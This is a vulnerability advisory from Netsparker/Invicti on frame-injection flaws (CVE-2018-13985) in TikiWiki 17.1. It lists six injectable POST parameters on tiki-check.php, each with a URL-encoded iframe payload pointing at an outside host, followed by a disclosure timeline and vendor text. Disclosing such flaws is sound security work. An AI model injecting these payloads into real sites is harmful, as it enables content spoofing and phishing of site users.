Information
--------------------
Advisory by Netsparker (now Invicti)
Name: Frame Injection Vulnerabilities in TikiWiki
Affected Software: TikiWiki
Affected Versions: 17.1
Homepage: https://tiki.org/tiki-index.php
Vulnerability: Frame Injection Vulnerabilities
Severity: Medium
Status: Fixed
CVE-ID: CVE-2018-13985
CVSS Score (3.0): CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
Invicti Advisory Reference: NS-18-009

Technical Details - (Install)
--------------------

URL  http://app.scan/ScanApp/tiki-17.1/tiki-check.php
Parameter Name  dbhost
Parameter Type  POST
Attack Pattern  %3ciframe+src%3d%22http%3a%2f%2fr87.com%2f%3f%22%3e%3c%2fiframe%3e

URL  http://app.scan/ScanApp/tiki-17.1/tiki-check.php
Parameter Name  email_test_to
Parameter Type  POST
Attack Pattern  %3ciframe+src%3d%22http%3a%2f%2fr87.com%2f%3f%22%3e%3c%2fiframe%3e

URL  http://app.scan/ScanApp/tiki-17.1/tiki-check.php?phpinfo=y
Parameter Name  dbhost
Parameter Type  POST
Attack Pattern  %3ciframe+src%3d%22http%3a%2f%2fr87.com%2f%3f%22%3e%3c%2fiframe%3e

URL  http://app.scan/ScanApp/tiki-17.1/tiki-check.php?phpinfo=y
Parameter Name  dbuser
Parameter Type  POST
Attack Pattern  %3ciframe+src%3d%22http%3a%2f%2fr87.com%2f%3f%22%3e%3c%2fiframe%3e

URL  http://app.scan/ScanApp/tiki-17.1/tiki-check.php?phpinfo=y
Parameter Name  email_test_to
Parameter Type  POST
Attack Pattern  %3ciframe+src%3d%22http%3a%2f%2fr87.com%2f%3f%22%3e%3c%2fiframe%3e

URL  http://app.scan/ScanApp/tiki-17.1/tiki-check.php?phpinfo=y
Parameter Name  dbhost
Parameter Type  POST
Attack Pattern  %3ciframe+src%3d%22http%3a%2f%2fr87.com%2f%3f%22%3e%3c%2fiframe%3e

Advisory Timeline
--------------------

5th October 2017 - First Contact
1st March 2018 - Vendor Fixed
12th July 2018 - Advisory Released

Credits & Authors
--------------------

These issues have been discovered by Omar Kurt while testing Invicti Web Application Security Scanner.

About Invicti
--------------------

Invicti Security is transforming the way web applications are secured. Invicti empowers organizations in every industry to scale their overall security operations, make the best use of their security resources, and engage developers in helping to improve their overall security posture.